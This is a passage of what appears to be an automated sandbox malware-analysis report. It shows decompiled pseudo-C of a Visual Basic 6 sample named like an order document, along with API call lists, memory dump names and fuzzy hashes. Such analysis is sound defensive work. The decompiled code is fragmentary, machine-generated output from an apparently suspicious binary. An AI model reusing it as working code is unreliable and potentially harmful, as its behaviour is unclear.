					_t44 =  *((intOrPtr*)( *_t43 + 0xf8))(_t43,  &_v40);
					asm("fclex");
					if(_t44 < 0) {
						_push(0xf8);
						_push(0x40da40);
						_push(_t73);
						_push(_t44);
						L00401558();
					}
					_v40 = 0;
					L00401504();
					L00401552();
					_push( &_v60);
					_v52 = 0x80020004;
					_v60 = 0xa;
					L0040148C();
					L00401516();
					_t46 =  *0x416010; // 0x6202b8
					if(_t46 == 0) {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						_t46 =  *0x416010; // 0x6202b8
					}
					_t48 =  &_v44;
					L0040154C();
					_t74 = _t48;
					_t50 =  *((intOrPtr*)( *_t74 + 0x48))(_t74,  &_v40, _t48,  *((intOrPtr*)( *_t46 + 0x304))(_t46));
					asm("fclex");
					if(_t50 < 0) {
						_push(0x48);
						_push(0x40da68);
						_push(_t74);
						_push(_t50);
						L00401558();
					}
					_v52 = _v40;
					_t40 =  &_v60;
					_push(_t40);
					_v40 = 0;
					_v60 = 8;
					L00401486();
					L00401504();
					L00401552();
					L00401516();
				}
				_push(E00414DE6);
				L00401528();
				L00401528();
				return _t40;
			}

0x00414c43
0x00414c52
0x00414c5f
0x00414c62
0x00414c6b
0x00414c6e
0x00414c74
0x00414c77
0x00414c7c
0x00414c7f
0x00414c82
0x00414c85
0x00414c88
0x00414c8b
0x00414c93
0x00414c99
0x00414c9f
0x00414ca1
0x00414ca6
0x00414cab
0x00414cab
0x00414cb0
0x00414cbd
0x00414cc0
0x00414cc4
0x00414cc6
0x00414cc8
0x00414ccd
0x00414cce
0x00414ccf
0x00414ccf
0x00414cd4
0x00414cde
0x00414ce0
0x00414ce6
0x00414cea
0x00414cec
0x00414cf1
0x00414cf6
0x00414cf7
0x00414cf8
0x00414cf8
0x00414d03
0x00414d06
0x00414d0e
0x00414d16
0x00414d17
0x00414d1e
0x00414d25
0x00414d2d
0x00414d32
0x00414d39
0x00414d3b
0x00414d40
0x00414d45
0x00414d4a
0x00414d4a
0x00414d59
0x00414d5d
0x00414d65
0x00414d6b
0x00414d6e
0x00414d72
0x00414d74
0x00414d76
0x00414d7b
0x00414d7c
0x00414d7d
0x00414d7d
0x00414d85
0x00414d88
0x00414d8b
0x00414d8c
0x00414d8f
0x00414d96
0x00414da0
0x00414da8
0x00414db0
0x00414db0
0x00414db5
0x00414dd8
0x00414de0
0x00414de5

APIs

__vbaLenBstr.MSVBVM60(0040DCCC), ref: 00414C8B
__vbaNew2.MSVBVM60(0040DA30,00416364,0040DCCC), ref: 00414CAB
__vbaHresultCheckObj.MSVBVM60(00000000,021AE8D4,0040DA20,00000014), ref: 00414CCF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000F8), ref: 00414CF8
__vbaStrMove.MSVBVM60(00000000,?,0040DA40,000000F8), ref: 00414D06
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,000000F8), ref: 00414D0E
#648.MSVBVM60(?), ref: 00414D25
__vbaFreeVar.MSVBVM60(?), ref: 00414D2D
__vbaNew2.MSVBVM60(0040DE54,00416010,?), ref: 00414D45
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414D5D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA68,00000048), ref: 00414D7D
#667.MSVBVM60(0000000A), ref: 00414D96
__vbaStrMove.MSVBVM60(0000000A), ref: 00414DA0
__vbaFreeObj.MSVBVM60(0000000A), ref: 00414DA8
__vbaFreeVar.MSVBVM60(0000000A), ref: 00414DB0
__vbaFreeStr.MSVBVM60(00414DE6,0040DCCC), ref: 00414DD8
__vbaFreeStr.MSVBVM60(00414DE6,0040DCCC), ref: 00414DE0

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#648#667Bstr
String ID:
API String ID: 1293598690-0
Opcode ID: a9c75e8508d2d699cd0675b886f5c3d5055cb9cfbd0eb965f66d36e535c347cd
Instruction ID: 872b19b41c9c175017c7fdac7b394595c20a8ce49ddcb627966ff441fb7a56ba
Opcode Fuzzy Hash: a9c75e8508d2d699cd0675b886f5c3d5055cb9cfbd0eb965f66d36e535c347cd
Instruction Fuzzy Hash: DA414070940208ABCB10EF95CC85EDEBBB8EF98304F10442BF506B72A1DB789945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00414E03, Relevance: 24.2, APIs: 16, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00414E03(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void _v304;
				int _v308;
				char _v312;
				void* _v316;
				char _v320;
				void _v476;
				intOrPtr* _t40;
				void* _t47;
				char* _t48;
				signed int _t53;
				void* _t55;
				intOrPtr* _t56;
				void* _t57;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;
				signed int _t66;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr _t108;

				_t99 = _t98 - 0xc;
				 *[fs:0x0] = _t99;
				_v16 = _t99 - 0x1cc;
				_v12 = 0x4013e0;
				_v8 = 0;
				_t40 = _a4;
				 *((intOrPtr*)( *_t40 + 4))(_t40, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t96);
				_t66 = 0x43;
				memset( &_v304, 0, _t66 << 2);
				asm("stosw");
				_push(0x22);
				memset( &_v476, 0, 0 << 2);
				_v308 = 0;
				_v312 = 0;
				_v316 = 0;
				_v320 = 0;
				L004014AA();
				_push(0);
				_push( &_v304);
				_t47 =  &_v476;
				_push(_t47);
				_push(0x40d540);
				L00401540();
				_push(_t47);
				_push(0x40da64);
				_t48 =  &_v312;
				_push(_t48);
				L0040153A();
				_push(_t48);
				E0040D634();
				L00401534();
				_push( &_v476);
				_push( &_v304);
				_push(0x40d540);
				L0040152E();
				_t53 =  ~(0 | _t48 == 0x001d821d);
				L00401528();
				if(_t53 != 0) {
					_t105 =  *0x416364; // 0x21ae8d4
					if(_t105 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t91 =  *0x416364; // 0x21ae8d4
					_t55 =  *((intOrPtr*)( *_t91 + 0x14))(_t91,  &_v316);
					asm("fclex");
					if(_t55 < 0) {
						_push(0x14);
						_push(0x40da20);
						_push(_t91);
						_push(_t55);
						L00401558();
					}
					_t56 = _v316;
					_t92 = _t56;
					_t57 =  *((intOrPtr*)( *_t56 + 0xb8))(_t56,  &_v320);
					asm("fclex");
					if(_t57 < 0) {
						_push(0xb8);
						_push(0x40da40);
						_push(_t92);
						_push(_t57);
						L00401558();
					}
					L00401552();
					_t108 =  *0x416364; // 0x21ae8d4
					if(_t108 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t93 =  *0x416364; // 0x21ae8d4
					_t59 =  *((intOrPtr*)( *_t93 + 0x14))(_t93,  &_v316);
					asm("fclex");
					if(_t59 < 0) {
						_push(0x14);
						_push(0x40da20);
						_push(_t93);
						_push(_t59);
						L00401558();
					}
					_t60 = _v316;
					_t94 = _t60;
					_t61 =  *((intOrPtr*)( *_t60 + 0x140))(_t60,  &_v320);
					asm("fclex");
					if(_t61 < 0) {
						_push(0x140);
						_push(0x40da40);
						_push(_t94);
						_push(_t61);
						L00401558();
					}
					L00401552();
					_t95 = _a4;
					_t53 =  *((intOrPtr*)( *_t95 + 0x15c))(_t95, 0x4acd);
					asm("fclex");
					if(_t53 < 0) {
						_push(0x15c);
						_push(0x40d230);
						_push(_t95);
						_push(_t53);
						L00401558();
					}
				}
				_push(E00415032);
				L00401528();
				return _t53;
			}

0x00414e06
0x00414e15
0x00414e25
0x00414e28
0x00414e31
0x00414e34
0x00414e3a
0x00414e42
0x00414e4b
0x00414e4d
0x00414e4f
0x00414e5a
0x00414e62
0x00414e68
0x00414e6e
0x00414e74
0x00414e7a
0x00414e7f
0x00414e86
0x00414e87
0x00414e8d
0x00414e93
0x00414e94
0x00414e99
0x00414e9a
0x00414e9f
0x00414ea5
0x00414ea6
0x00414eab
0x00414eac
0x00414eb3
0x00414ebe
0x00414ec5
0x00414ec6
0x00414ec7
0x00414edd
0x00414ee2
0x00414eea
0x00414ef0
0x00414ef6
0x00414ef8
0x00414efd
0x00414f02
0x00414f02
0x00414f07
0x00414f17
0x00414f1a
0x00414f1e
0x00414f20
0x00414f22
0x00414f27
0x00414f28
0x00414f29
0x00414f29
0x00414f2e
0x00414f3e
0x00414f40
0x00414f46
0x00414f4a
0x00414f4c
0x00414f51
0x00414f56
0x00414f57
0x00414f58
0x00414f58
0x00414f63
0x00414f68
0x00414f6e
0x00414f70
0x00414f75
0x00414f7a
0x00414f7a
0x00414f7f
0x00414f8f
0x00414f92
0x00414f96
0x00414f98
0x00414f9a
0x00414f9f
0x00414fa0
0x00414fa1
0x00414fa1
0x00414fa6
0x00414fb6
0x00414fb8
0x00414fbe
0x00414fc2
0x00414fc4
0x00414fc9
0x00414fce
0x00414fcf
0x00414fd0
0x00414fd0
0x00414fdb
0x00414fe0
0x00414feb
0x00414ff1
0x00414ff5
0x00414ff7
0x00414ffc
0x00415001
0x00415002
0x00415003
0x00415003
0x00414ff5
0x00415008
0x0041502c
0x00415031

APIs

__vbaStrCopy.MSVBVM60 ref: 00414E7A
__vbaRecUniToAnsi.MSVBVM60(0040D540,?,?,00000000), ref: 00414E94
__vbaStrToAnsi.MSVBVM60(?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414EA6
__vbaSetSystemError.MSVBVM60(00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414EB3
__vbaRecAnsiToUni.MSVBVM60(0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414EC7
__vbaFreeStr.MSVBVM60(0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414EE2
__vbaNew2.MSVBVM60(0040DA30,00416364,0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 00414F02
__vbaHresultCheckObj.MSVBVM60(00000000,021AE8D4,0040DA20,00000014), ref: 00414F29
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000B8), ref: 00414F58
__vbaFreeObj.MSVBVM60 ref: 00414F63
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 00414F7A
__vbaHresultCheckObj.MSVBVM60(00000000,021AE8D4,0040DA20,00000014), ref: 00414FA1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,00000140), ref: 00414FD0
__vbaFreeObj.MSVBVM60 ref: 00414FDB
__vbaHresultCheckObj.MSVBVM60(00000000,004013E0,0040D230,0000015C), ref: 00415003
__vbaFreeStr.MSVBVM60(00415032,0040D540,?,?,00000000,?,0040DA64,00000000,0040D540,?,?,00000000), ref: 0041502C

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$Ansi$New2$CopyErrorSystem
String ID:
API String ID: 1472228644-0
Opcode ID: 4130ff6df4808c78dc73b1a5c044922298842ab7beea5b9cfe8be9eab6876e0d
Instruction ID: 8dde61886954f1ba9d13cf90cf58c9732770f97a13413e71496592f5bed2e878
Opcode Fuzzy Hash: 4130ff6df4808c78dc73b1a5c044922298842ab7beea5b9cfe8be9eab6876e0d
Instruction Fuzzy Hash: 8E516471A01214BBCB10EF65CC85EDA77B8AF49704F1044BAF50AB71D1DA78AB85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041464F, Relevance: 18.1, APIs: 12, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041464F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				char _v56;
				intOrPtr* _v68;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t39;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t46;
				void* _t48;
				void* _t50;
				intOrPtr* _t60;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t69;

				_push(0x4013f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t69;
				_v12 = _t69 - 0x38;
				_v8 = 0x401388;
				_t32 =  *0x416010; // 0x6202b8
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v56 = 0;
				if(_t32 != 0) {
					_t50 = 0x40de54;
				} else {
					_push(0x416010);
					_t50 = 0x40de54;
					_push(0x40de54);
					L0040155E();
					_t32 =  *0x416010; // 0x6202b8
				}
				_push( *((intOrPtr*)( *_t32 + 0x378))(_t32));
				_t34 =  &_v36;
				_push(_t34);
				L0040154C();
				_t60 = _t34;
				_t35 =  *0x416010; // 0x6202b8
				_v68 = _t60;
				_v44 = 0x80020004;
				_v52 = 0xa;
				if(_t35 == 0) {
					_push(0x416010);
					_push(_t50);
					L0040155E();
					_t35 =  *0x416010; // 0x6202b8
				}
				_t37 =  &_v32;
				L0040154C();
				_t64 = _t37;
				_t39 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v28, _t37,  *((intOrPtr*)( *_t35 + 0x300))(_t35));
				asm("fclex");
				if(_t39 < 0) {
					_push(0x48);
					_push(0x40dc04);
					_push(_t64);
					_push(_t39);
					L00401558();
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t41 =  *((intOrPtr*)( *_t60 + 0x1ec))(_v68, _v28);
				asm("fclex");
				if(_t41 < 0) {
					_push(0x1ec);
					_push(0x40da50);
					_push(_v68);
					_push(_t41);
					L00401558();
				}
				L00401528();
				_push( &_v36);
				_push( &_v32);
				_push(2);
				L00401546();
				_t44 =  *0x416010; // 0x6202b8
				if(_t44 == 0) {
					_push(0x416010);
					_push(_t50);
					L0040155E();
					_t44 =  *0x416010; // 0x6202b8
				}
				_t46 =  &_v32;
				L0040154C();
				_t66 = _t46;
				_t48 =  *((intOrPtr*)( *_t66 + 0x80))(_t66,  &_v56, _t46,  *((intOrPtr*)( *_t44 + 0x394))(_t44));
				asm("fclex");
				if(_t48 < 0) {
					_push(0x80);
					_push(0x40dbf4);
					_push(_t66);
					_push(_t48);
					L00401558();
				}
				_v24 = _v56;
				L00401552();
				asm("wait");
				_push(E004147ED);
				return _t48;
			}

0x00414654
0x0041465f
0x00414660
0x0041466d
0x00414670
0x00414677
0x00414680
0x00414683
0x00414686
0x00414689
0x0041468c
0x004146a5
0x0041468e
0x0041468e
0x00414693
0x00414698
0x00414699
0x0041469e
0x0041469e
0x004146b3
0x004146b4
0x004146b7
0x004146b8
0x004146bd
0x004146bf
0x004146c6
0x004146c9
0x004146d0
0x004146d7
0x004146d9
0x004146de
0x004146df
0x004146e4
0x004146e4
0x004146f3
0x004146f7
0x004146ff
0x00414705
0x00414708
0x0041470c
0x0041470e
0x00414710
0x00414715
0x00414716
0x00414717
0x00414717
0x0041472c
0x0041472d
0x0041472e
0x0041472f
0x00414730
0x00414738
0x0041473a
0x0041473c
0x00414741
0x00414746
0x00414749
0x0041474a
0x0041474a
0x00414752
0x0041475a
0x0041475e
0x0041475f
0x00414761
0x00414766
0x00414770
0x00414772
0x00414777
0x00414778
0x0041477d
0x0041477d
0x0041478c
0x00414790
0x00414798
0x0041479e
0x004147a4
0x004147a8
0x004147aa
0x004147af
0x004147b4
0x004147b5
0x004147b6
0x004147b6
0x004147c1
0x004147c4
0x004147c9
0x004147ca
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00414699
__vbaObjSet.MSVBVM60(?,00000000), ref: 004146B8
__vbaNew2.MSVBVM60(0040DE54,00416010,?,00000000), ref: 004146DF
__vbaObjSet.MSVBVM60(?,00000000), ref: 004146F7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DC04,00000048), ref: 00414717
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,000001EC), ref: 0041474A
__vbaFreeStr.MSVBVM60 ref: 00414752
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00414761
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00414778
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414790
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DBF4,00000080), ref: 004147B6
__vbaFreeObj.MSVBVM60 ref: 004147C4

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID:
API String ID: 2509323985-0
Opcode ID: b05eeb994426f6bea324882602be6421287ab77d7972e167bae0895f1c45ccc3
Instruction ID: 5745aa85450775d4e26770f8803a9de9100647a3b332e89c7cb4159715897730
Opcode Fuzzy Hash: b05eeb994426f6bea324882602be6421287ab77d7972e167bae0895f1c45ccc3
Instruction Fuzzy Hash: 98413170A00214ABDB10EF95CC49FEE7BBCEF49704F10442AF552BB191DB799945CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00414808, Relevance: 12.1, APIs: 8, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00414808(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				char _v84;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr* _t62;
				void* _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;

				_t66 = _t65 - 0xc;
				 *[fs:0x0] = _t66;
				_t67 = _t66 - 0x4c;
				_v16 = _t67;
				_v12 = 0x4013a0;
				_v8 = 0;
				_t30 = _a4;
				 *((intOrPtr*)( *_t30 + 4))(_t30, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t63);
				_t32 =  *0x416010; // 0x6202b8
				_v28 = 0;
				_v32 = 0;
				_v84 = 0;
				if(_t32 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t32 =  *0x416010; // 0x6202b8
				}
				_t34 =  &_v32;
				L0040154C();
				_t45 = _t34;
				_t35 = 0xa;
				_v80 = _t35;
				_v72 = 0x80020004;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v64 = _t35;
				_v56 = 0x80020004;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v48 = _t35;
				_v40 = 0x80020004;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t67 - 0xfffffffffffffff0)) =  *0x401398;
				_t37 =  *((intOrPtr*)( *_t45 + 0x178))(_t45, 0x80020004, _t34,  *((intOrPtr*)( *_t32 + 0x31c))(_t32));
				asm("fclex");
				if(_t37 < 0) {
					_push(0x178);
					_push(0x40dbd4);
					_push(_t45);
					_push(_t37);
					L00401558();
				}
				L00401552();
				_t38 =  *0x416010; // 0x6202b8
				if(_t38 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t38 =  *0x416010; // 0x6202b8
				}
				_t40 =  &_v32;
				L0040154C();
				_t62 = _t40;
				_t42 =  *((intOrPtr*)( *_t62 + 0xb0))(_t62,  &_v84, _t40,  *((intOrPtr*)( *_t38 + 0x394))(_t38));
				asm("fclex");
				if(_t42 < 0) {
					_push(0xb0);
					_push(0x40dbf4);
					_push(_t62);
					_push(_t42);
					L00401558();
				}
				_t43 = _v84;
				_v28 = _t43;
				L00401552();
				asm("wait");
				_push(E00414960);
				return _t43;
			}

0x0041480b
0x0041481a
0x00414821
0x00414827
0x0041482a
0x00414833
0x00414836
0x0041483c
0x0041483f
0x00414846
0x00414849
0x0041484c
0x0041484f
0x00414851
0x00414856
0x0041485b
0x00414860
0x00414860
0x0041486f
0x00414873
0x00414880
0x00414882
0x0041488d
0x00414890
0x00414896
0x00414897
0x00414898
0x00414899
0x0041489d
0x004148a2
0x004148a8
0x004148a9
0x004148aa
0x004148ab
0x004148af
0x004148b4
0x004148bc
0x004148bd
0x004148be
0x004148c0
0x004148c1
0x004148c5
0x004148cd
0x004148cf
0x004148d1
0x004148d6
0x004148db
0x004148dc
0x004148dd
0x004148dd
0x004148e5
0x004148ea
0x004148f1
0x004148f3
0x004148f8
0x004148fd
0x00414902
0x00414902
0x00414911
0x00414915
0x0041491d
0x00414923
0x00414929
0x0041492d
0x0041492f
0x00414934
0x00414939
0x0041493a
0x0041493b
0x0041493b
0x00414940
0x00414946
0x00414949
0x0041494e
0x0041494f
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 0041485B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414873
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DBD4,00000178), ref: 004148DD
__vbaFreeObj.MSVBVM60 ref: 004148E5
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004148FD
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414915
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DBF4,000000B0), ref: 0041493B
__vbaFreeObj.MSVBVM60 ref: 00414949

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: 24f967fbb86b7872246db838adff310dacac89c3a8d7784753ddca9c3a8d8c5f
Instruction ID: 70e809ebe6a838e3604b4f47ab4e33f29980c4aa0330dfeab0687ba9c13de547
Opcode Fuzzy Hash: 24f967fbb86b7872246db838adff310dacac89c3a8d7784753ddca9c3a8d8c5f
Instruction Fuzzy Hash: 3C414FB0E00204ABCB00EFA9C845ADF7BB8AF49704F10446AF856FB291D77899058B99

Uniqueness

Uniqueness Score: -1.00%

Function 00414276, Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00414276(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				void* _v48;
				intOrPtr* _t28;
				void* _t31;
				intOrPtr* _t32;
				void* _t33;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t56;

				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				_v16 = _t54 - 0x34;
				_v12 = 0x401358;
				_v8 = 0;
				_t28 = _a4;
				 *((intOrPtr*)( *_t28 + 4))(_t28, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t51);
				_v28 = 0;
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				L004014AA();
				_t56 =  *0x416364; // 0x21ae8d4
				if(_t56 == 0) {
					_push(0x416364);
					_push(0x40da30);
					L0040155E();
				}
				_t49 =  *0x416364; // 0x21ae8d4
				_t31 =  *((intOrPtr*)( *_t49 + 0x14))(_t49,  &_v48);
				asm("fclex");
				if(_t31 < 0) {
					_push(0x14);
					_push(0x40da20);
					_push(_t49);
					_push(_t31);
					L00401558();
				}
				_t32 = _v48;
				_t50 = _t32;
				_t33 =  *((intOrPtr*)( *_t32 + 0xf0))(_t32,  &_v44);
				asm("fclex");
				if(_t33 < 0) {
					_push(0xf0);
					_push(0x40da40);
					_push(_t50);
					_push(_t33);
					L00401558();
				}
				_v44 = 0;
				L00401504();
				L00401552();
				_v36 = 0xa2697710;
				_v32 = 0x5af8;
				_push(E0041437B);
				L00401528();
				L00401528();
				return _t33;
			}

0x00414279
0x00414288
0x00414295
0x00414298
0x004142a1
0x004142a4
0x004142aa
0x004142b3
0x004142b6
0x004142b9
0x004142bc
0x004142bf
0x004142c2
0x004142c5
0x004142ca
0x004142d0
0x004142d2
0x004142d7
0x004142dc
0x004142dc
0x004142e1
0x004142ee
0x004142f1
0x004142f5
0x004142f7
0x004142f9
0x004142fe
0x004142ff
0x00414300
0x00414300
0x00414305
0x0041430f
0x00414311
0x00414317
0x0041431b
0x0041431d
0x00414322
0x00414327
0x00414328
0x00414329
0x00414329
0x00414334
0x00414337
0x0041433f
0x00414344
0x0041434b
0x00414352
0x0041436d
0x00414375
0x0041437a

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013F6), ref: 004142C5
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 004142DC
__vbaHresultCheckObj.MSVBVM60(00000000,021AE8D4,0040DA20,00000014), ref: 00414300
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000F0), ref: 00414329
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414337
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013F6), ref: 0041433F
__vbaFreeStr.MSVBVM60(0041437B), ref: 0041436D
__vbaFreeStr.MSVBVM60(0041437B), ref: 00414375

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$CopyMoveNew2
String ID:
API String ID: 116834155-0
Opcode ID: 1f65c44ceff44b544526d7977db3fe383e395b4a8e58e498864ad9fa64425a42
Instruction ID: 5c5e7974bcc5d9572154f563ef020c6c26bdcc467250221397c27389d09463e2
Opcode Fuzzy Hash: 1f65c44ceff44b544526d7977db3fe383e395b4a8e58e498864ad9fa64425a42
Instruction Fuzzy Hash: E1212470D40209ABCB00EF96C946AEEBBB4FF99714F10406AE412772A1D7789545CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414B52, Relevance: 12.1, APIs: 8, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00414B52(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a24, void* _a28) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr* _t20;
				intOrPtr* _t22;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr* _t40;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				_v16 = _t44 - 0x1c;
				_v12 = 0x4013c0;
				_v8 = 0;
				_t20 = _a4;
				 *((intOrPtr*)( *_t20 + 4))(_t20, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t41);
				_v28 = 0;
				_v32 = 0;
